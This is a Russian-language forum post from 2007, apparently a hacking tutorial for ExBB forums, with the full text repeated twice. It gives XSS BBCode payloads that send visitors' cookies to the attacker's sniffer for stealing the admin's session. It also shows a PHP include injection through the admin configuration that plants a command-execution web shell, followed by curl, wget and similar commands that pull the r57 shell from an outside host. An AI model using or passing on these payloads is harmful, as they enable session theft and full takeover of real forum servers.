N0n$e№Z
05.01.2007, 01:31
И так в этой статье я расскажу как использовать уязвимости в форумах ExBB
XSS:
[+email]'style='display:none;background:url(javascript:doc ument.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]
Перед использованием удалить из строчек +
Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!
Exploit's :
http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686
PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)
Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!
Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'
hackexbb.txt (Должен иметь содержимое со скриптом)
<?
$fp=fopen("im/avatars/personal/shell.php", "w");
fputs($fp,"<?
system(\$_GET['c']);
?>");
fclose($fp);
?>
Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!
Далее...
Все это примет вид - http://site/exbb/im/avatars/personal/shell.php
Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls
Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС
Для заливки файлом используем команды:
curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
get http://vrms.narod.ru/r57shell.php > /r57shell.php
links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php
lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php
fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
И дальше r57 поможет вам во всем!!
Удачи!Данная статья не является пособием по взлому)))
XSS:
[+email]'style='display:none;background:url(javascript:doc ument.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]
Перед использованием удалить из строчек +
Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!
Exploit's :
http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686
PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)
Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!
Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'
hackexbb.txt (Должен иметь содержимое со скриптом)
<?
$fp=fopen("im/avatars/personal/shell.php", "w");
fputs($fp,"<?
system(\$_GET['c']);
?>");
fclose($fp);
?>
Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!
Далее...
Все это примет вид - http://site/exbb/im/avatars/personal/shell.php
Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls
Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС
Для заливки файлом используем команды:
curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
get http://vrms.narod.ru/r57shell.php > /r57shell.php
links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php
lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php
fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php
И дальше r57 поможет вам во всем!!
Удачи!Данная статья не является пособием по взлому)))